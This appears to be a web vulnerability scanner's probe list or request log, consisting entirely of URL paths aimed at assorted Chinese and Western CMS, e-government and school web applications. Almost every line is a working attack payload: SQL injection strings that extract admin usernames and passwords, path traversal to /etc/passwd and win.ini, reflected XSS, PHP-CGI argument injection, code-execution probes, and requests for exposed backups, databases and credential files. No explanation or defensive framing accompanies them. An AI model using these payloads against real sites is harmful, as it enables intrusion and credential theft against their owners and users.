/EditPhotoHandle.aspx?Action=EditCover&PhotoId=(SELECT%20CHAR(106)%2bCHAR(107))
/ShopManage.aspx
/RegionHandle.aspx?action=GetChildNode&ParentId=(select%20%20(char(106)%2bchar(100)))
/SNS/Product/WaterfallProductListData
/ProSales/GetListCate
/jphoto/jphoto/sys/member/opr_export.jsp
/JwGl/jxjh/JxjhXGBc.asp
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500-52-25-1.html
/defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../index.jsp
/defaultroot/public/select_user/search_org_list.jsp?searchName=a%27%20UNION%20ALL%20SELECT%20CONCAT%280x23%2C0x7765627363616E3A693A66696E64%2C0x23%29%2CNULL%23
/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(108)%2bCHAR(109)%2bCHAR(110),NULL,NULL,NULL,NULL,NULL,NULL--
/cjcx/xuesheng/czjl/shuru.asp?id=-28%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(100)%2bCHAR(100)%2bCHAR(60)%20--&xueke=
/cjcx/bkxt/yqts1.asp?newsid=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/cjcx/bkxt/xxpj.asp?id=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/cjcx/kagx/main3.asp?rjxk=dd'%20and%201=(CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))%20--&xqmc=%25&jsxm=&mc=&ktlx=&page=
/login.asp
/search.php
/LoginCheck4.asp?LoginLb=jwc&Account=1'%20AND%201=CHAR(106)%20--&PassWord=0
/jwgl/jxjh/jxjha.asp
/jwgl/jcxx/savetofile.asp
/public/jsp/livephotoupload.jsp?path=archives&mode=add&hiddenName=1.jsp&visualName=2.jsp
/Help.aspx?id=(SELECT%20CHAR(106)%2bCHAR(103)%2bCHAR(105)%2bCHAR(100))
/govezoffice/gov_documentmanager/senddocument_import.jsp?categoryId=1&path=archives&mode=add&fileName=1.jsp&saveName=2.jsp&fileMaxSize=0&fileMaxNum=100&fileType=jsp
/edoas2/edoas2_test.jsp
/Report/AjaxHandle/StationChoose/StationTree.ashx?STTP='KKK')%20AND%201587=CONVERT(INT,(CHAR(58)%2bCHAR(117)))%20--&RadioType=Radio_XZ&ReportID=Report22
/celive/live/header.php
/SystemManage/AjaxHandle/AjaxVertifyUserID.ashx?uid=1'%20AND%201=CHAR(106)%20--
/skywcm/webpage/download.jsp?absolutePath=C:%5Cwindows%5Cwin.ini&downFileName=win.ini
/RdrRInforDetail.aspx?page=1&Index=4&KeyWord=AA'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&name=r_infor&AcqSys=CN
/m/info/top_rating.action?clsNo=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'at'='at
/BaseCourse/RushTeamCollect.aspx?adcd=1&key=1%25'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
/Plan/FloodPlan/FileEdit.aspx?id=1'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
/BaseCourse/FloodDisastersQueryContent.aspx?areacode=1&DirTypeDetailId=1%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--&Name=1
/Disaster/Reporting/ReportingDetail.aspx?ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
/Disaster/Reporting/ReportingInfo.aspx?oper=update&ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
/Duty/AjaxHandle/Jquery.autocomplete/AutocompleteContactByName.ashx?_=&q=313%25'%20AND%203=CHAR(106)%2bCHAR(99)%20--&limit=10&timestamp=
/plan/FloodPlan/FloodPlanFileShow.aspx?ReadOnly=&ID=499'%20AND%203=CHAR(106)%2bCHAR(99)%20--&filetype=156&ParentID=0&adomParameter=292
/admin/admin_database.aspx
/flex/newsmessage.jsp?uname=-1122'%20AND%2012=(SELECT%20CHAR(99))%20--
/video/videoView.jsp?videoid=250%20AND%201=(SELECT%20CHAR(106)%2bCHAR(58))
/blue_show.aspx?paperName=hehe'%20and%201=(select%20char(106))%20--&qnum=20
/?m=product&s=list&key=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%23
/search.do?searchInfo=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
/ModifyNewsAction.do?newsID=364'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
/navigate.do?method=getPolicyinfoDataById&id=2631&menuNo=05'%20and%201=(select%20char(106))%20--
/model/TwoGradePage/Equipment_detail.aspx?id=11314%20and%201=(select%2bchar(106))%20--
/model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=12%20and%201=(select%2bchar(106))%20--
/model/TwoGradePage/newsdetail.aspx?id=279&columnId=70%20and%201=(select%2bchar(106))
/cctrl/admin/news/contShow.php?id=2'%20and%20(select%201%20from%20%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%23
/cctrl/backup/index.php
/cctrl/admin/purview/purview.php
/data_Xbaby/gdjm133950.mdb
/admin/message_der.asp?id=7%20union%20select%201,chr(97),chr(106),4,5%20from%20admin
/admin/fuwu_der.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/admin/fuwu_modi.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/admin/upfile.asp
/admin/upfile_yqhy.asp
/FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=-1%20AND%201=(SELECT%20CHAR(106)%2bCHAR(67))%20--
/FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=30000&VideoID=105%20and%201=(SELECT%20CHAR(86)%2bCHAR(105))
/FWeb/WorkRoomWeb/Web/TeacherCourse.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
/FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
/FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=101%20AND%201=(SELECT%20CHAR(106)%2bCHAR(79))&diaryID=1
/VIEWGOOD/ADI/portal/UserDataSync.aspx
/SPM/Pc/Content/Request.aspx?action=name_check
/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1'%20AND%20(SELECT%20CHAR(86))%3E0--&AssetID=1&CaptionName=1
/adksvod/PublicFolder/AuthorVideo.aspx?AuthorID=-4448%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/App_Site/SiteSearch.aspx?Title=1'%20AND%20(SELECT%20CHAR(58)%2bCHAR(85))%3E1%20--
/adksvod/PublicFolder/ShareVideoList.aspx?TagID=-1406%25%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/adksvod/PublicFolder/VideoList.aspx?userid=1&TagID=101%25%27%20AND%202358%3DCONVERT%28INT%2C%28CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29%29%29%20--&type=catalog&level=3
/ismservice/jsp/billQueryPage.jsp?entercode=3%22%3C/script%3E%3Cscript%3Eprompt(42873);%3C/script%3E//
/admin/include/del.asp?tableName=feedback&pk=id&pkValue=IIF(iamnotfunction(),1,0)
/include/upload.asp
/TownsWeb/PageModule/MessageInfoList.aspx?MediaID=1'%20AND%201=CHAR(108)%20--
/TownsWeb/PageModule/MessageInfoSender.aspx?msgID=1'%20AND%201=CHAR(107)%20--
/Duty/write/FileType.aspx?hideBtn=1&ID=1'%20and%201=char(86)%20--
/WarnMaintence/AJaxHandler/UpdateSortNo.ashx?fnName=1&DeptCd=1&SortNo=(select%20char(86)%2bchar(95))
/WarnMaintence/SelectContacts.aspx?fnName=UpdateContact&selectedNodes=1&contactDeptCD=(select%20char(88)%2bchar(95))
/Warn/AjaxHandle/AjaxDeleteMsgInfo.ashx?action=DeleteMsg&msgid=(CONVERT(INT,(SELECT%20CHAR(99)%2bCHAR(86)%2bCHAR(94)%2bCHAR(101)%2bCHAR(93))))
/Map/AjaxHandler/AjaxMapCustomAction.ashx?action=GetParamVal&param=FaxUrl'%20and%202=(select%20char(118))%20--&dateForAjax=417
/products.asp
/App_Site/SiteTag.aspx?Tag=1'%20and%20char(106)=1%20--
/product_view.asp
/system/database/data.mdb
/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=/
/manage/CHKLOGIN.ASP
/Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1%20and%201=(select%20char(96)%2bchar(98))&asid=321001
/Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1&asid=1001%20and%201=(select%20char(76)%2bchar(98))
/search.asp
/onlineApply.do?method=initQlxm&depNo=321'%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=21')%20and%203=char(109)%20--&stationType='KKK','ZZ','PP','RR'&StationChooseType=Single&ReportID=Report16
/db1/%23kepu.mdb
/upfile.asp
/upfile2.asp
/upfile3.asp
/data/xinfang.mdb
/VIEWGOOD/WebMedia/search.aspx?key=0&searchCondition=1')%20AND%201=(SELECT%20CHAR(106))%20--&rnd=0.85
/gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00&gw_title=%00
/Duty/MailList/ContactUpdate.aspx?ReadOnly=&UnitID=1&ContactID=-1+and+1=(SELECT%20CHAR(106))
/WS/WebServiceBase.asmx/GetXMLList
/WS/WebService.asmx/GetFile
/WS/WebService.asmx/GetFileContent
/WS/WebService.asmx
/bos/desktop/ajax/EcAjax.aspx
/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=%27%2b+(select+convert(int%2c(CHAR(106)%2bCHAR(79)))+FROM+syscolumns)+%2b%27
/Factory/AjaxGetCSDM.aspx?CSDM=TEST'%20AND%201=CHAR(106)%20--&a=1.1
/ldhyhd.do?theAction=edit_bzOne&id=1'%20UNION%20ALL%20SELECT%20NULL,CHR(113)%7C%7CCHR(120)%7C%7CCHR(105)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(115)%7C%7CCHR(78)%7C%7CCHR(65)%7C%7CCHR(108)%7C%7CCHR(70)%7C%7CCHR(71)%7C%7CCHR(103)%7C%7CCHR(98)%7C%7CCHR(120)%7C%7CCHR(75)%7C%7CCHR(113)%7C%7CCHR(114)%7C%7CCHR(109)%7C%7CCHR(108)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/model/twogradepage/listSend.aspx?appid=1%20AND%20CHAR(106)=1
/interface/ipsconnect/ipsconnect.php
/templates/
/service/local/outreach/welcome/nexusSpaces.css
/phpRedisAdmin/?overview
/?overview
/index.html#/dashboard/file/logstash.json
/
/index.php/weblinks-categories?id=just_test
/index.php/admin/?case=archive&act=respond&code=alipay&trade_status=WAIT_SELLER_SEND_GOODS
/index.php?m=Article&a=showByUname&uname=%2527or%25201%253D%2528select%25201%2520from%2520%2528select%2520count%2528%252a%2529%252Cconcat%2528floor%2528rand%25280%2529%252a2%2529%252C%2528select%2520md5%25281122%2529%2520from%2520fanwe_admin%2520limit%25200%252C1%2529%2529a%2520from%2520information_schema.tables%2520group%2520by%2520a%2529b%2529%2523
/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media
/index.php?c=api&a=down&file=YWQ2OVpRcGJtL3d3NWh5WmVxbkNYbGRnZjVnalFLSXRaWkRpT1dVZmNXQ1BqNjhPeE82RkpKak1iWUZwcDZrK2tXaFZYdTRZ
/share.php?F_email=test@vul.org%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/test
/oxoxoxoxoxoxox.com
/oxoxoxoxoxoxox.com/
/api/xmlrpc
/wwwroot.rar
/wwwroot.zip
/wwwroot.tar.gz
/web.rar
/www.rar
/www.zip
/www.tar.gz
/web.zip
/crossdomain.xml
/webscan_test.txt
/phpinfo.php
/info.php
/test.php
/shop.php?ac=view&shopid=1-cfreer
/wp-includes/registration-functions.php
/wp-includes/registration.php
/
/
/NOEXICT.php?A%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23
/pass.txt
/passwd
/password.txt
/passwords.txt
/users.txt
/users.ini
/admin.cfg
/install.log
/database.inc
/common.inc
/db.inc
/connect.inc
/conn.inc
/sql.inc
/.bash_history
/.bashrc
/Web.config
/Global.asax
/Global.asa
/Global.asax.cs
/data.mdb
/domcfg.nsf
/names.nsf
/log.nsf
/domlog.nsf
/.rediscli_history
/data/%23data.mdb
/config.inc.php.bak
/config/config_ucenter.php.bak
/config/config_global.php.bak
/uc_server/data/config.inc.php.bak
/data/common.inc.php.bak
/wp-config.php.bak
/WEB-INF/database.properties
/
/robots.txt
/
/index.php?a=1%3Cscript%3Ealert(abc)%3C/script%3E
/
/nevercouldexistfilenosec
/nevercouldexistfilewebsec
/nevercouldexistfilenosec.aspx
/nevercouldexistfilewebsec.aspx
/nevercouldexistfilenosec.shtml
/nevercouldexistfilewebsec.shtml
/nevercouldexistfilenosec/
/nevercouldexistfilewebsec/
/nevercouldexistfilenosec.zip
/nevercouldexistfilewebsec.zip
/nevercouldexistfilenosec.php
/nevercouldexistfilewebsec.php
/nevercouldexistfilenosec.bak
/nevercouldexistfilewebsec.bak
/nevercouldexistfilenosec.rar
/nevercouldexistfilewebsec.rar
/
/wp-admin
/
/admin.php
/dede/
/administrator/
/jsky_web_scanner_test_file.txt
/user
/nosec_Web_Scanner_Test.dll
/TRACE_test
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini
/TRACK_test
/
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwinnt/win.ini
/_vti_bin/_vti_adm/admin.dll
/_vti_bin/_vti_aut/author.dll
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
/%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini
/_vti_bin/shtml.exe?_vti_rpc
/server-info
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/server-status
/jmx-console/
/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
/web-console/
/
/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./windows/win.ini
/webscan360noThisFile*~1*/.aspx
/cgi-bin/php-cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../windows/win.ini
/cgi-bin/php.cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
/.../.../.../.../.../.../.../.../windows/win.ini
/cgi-bin/php4?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/cgi-bin/php5?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini
/phpMyAdmin/show_config_errors.php
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/phpMyAdmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br][a%40http://webscan.360.cn%40]This%20Is%20a%20Link[%2Fa]
/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
/xampp/index.php
/etc/passwd
/axis2/axis2-admin/login?userName=admin&password=axis2&submit=+Login+
/etc/passwd
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd
/?search=just_test_not_find_href
/$
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
/solr/dev/admin/
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/
/level/15/exec/-/show/running-config/CR
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
/plugins/weathermap/weathermap-cacti-plugin.php
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
/
/.../.../.../.../.../.../.../.../etc/passwd
/
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/icons/index
/icons/small/index
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd
/
/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
/
/
/%3Cscript%3Ealert(42873).do
/
/%3Cscript%20s%3Ealert(42873)
/
/?%22onmouseover='prompt(42873)'bad=%22%3E
/
/%22%3E%3CsCrIpT%3Eprompt(42873)
/compare.php?goods[]=1111&goods[]=1112&goods[]=1113%22%3E%3Cscript%3Ealert(360)%3C/script%3E
/?xss_test%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%3E
/?callback=%3Cscript%3Eprompt(42873)%3C/script%3E
/
/'IHLD
/
/
/
/install.php
/
/install/index.php
/fckeditor/editor/dialog/fck_about.html
/invoker/EJBInvokerServlet/
/extras/curltest.php?url=file://curltest.php
/invoker/JMXInvokerServlet/
/
/.svn/entries
/
/include/common.inc.php?_POST[GLOBALS][cfg_dbname]=1
/wap.php?pageBody=%3Cscript%3Ealert(42873)%3C/script%3E
/plus/carbuyaction.php
/plus/carbuyaction.php?dopost=return&code=../../index
/api/uc.php?code=fd92NqvC0fvDd3K8T4F9wiNlGHGg%2Bz13GSxyds04jK36mfZacZwYY5bVdHPO0hSTj4Zd4Q7mhGp70q%2BosC6PYhZZQxKJp3vOR5z5SQ
/
/
/yp/product.php?q=&action=searchlist&where=%23
/indivgroup_dispbbs.php?groupid=1&id=2&page=1&groupboardid=-1%20union%20all%20select%201,1,1,%200x73616665333,1,1,1,1,1,1,1,1,1
/yp/product.php?pagesize=$%7B@print(md5(42873))%7D
/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+0x6A7573743A66696E6431,2,3,4,5,6--
/flow.php?step=login
/search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
/
/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,42873,4,5,6,7%20from%20shopxp_admin
/
/index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/_database/qiye_free.asp
/apps/include.php?file=index.php
/huangou.php?id=1%20and%201=2%20union%20select%20unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0%20--
/
/wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e,jishigou_members.password,0x27,0x7e)%20from%20jishigou_members%20where%20uid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
/manage/login.php
/vote.php?act=dovote&name[1%20and%20(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23][111]=aa
/api/upload/swfthumbnail.php?id=../../include/common.inc.php
/Inc/conn.asp
/
/user/reg3.php
/News_search.asp?key=7%25'%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10%20from%20admin%20where%201%20or%20'%25'='&otype=title&Submit=%CB%D1%CB%F7
/celive/js/include.php?departmentid=webscan'&cmseasylive=1
/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1
/CompVisualizeBig.asp?id=-1%20union%20select%201,username%2bpassword,3,4,5%20from%20admin
/ask/search_ajax.php?q=s%bb%27
/yp/job.php?action=applylist&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
/yp/job.php?action=list&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
/web/?id=-1'
/huangou.php?id=1/**/and/**/1=2/**/ununionion/**/seselectlect/**/unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0/**/--
/js/calendar.php?lang=../js
/xampp/showcode.php/showcode.php?showcode=1
/index.php?case=../../../../../../../../../../../../../../../../etc/passwd%00
/login.php
/admin/index.asp
/Jingdian/Jingdian_Show.Asp?Jingdian_Id=-1%20and%201=2%20union%20select%201,admin_pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20UU_admin
/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+20120328,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
/phpcms/data/js.php?id=1
/index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,CONCAT(0x7c,username,0x7c,password,0x7c,CHAR(119,101,98,115,99,97,110)),7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20wiki_user%20where%20groupid=4%20limit%201%23
/plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500
/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500
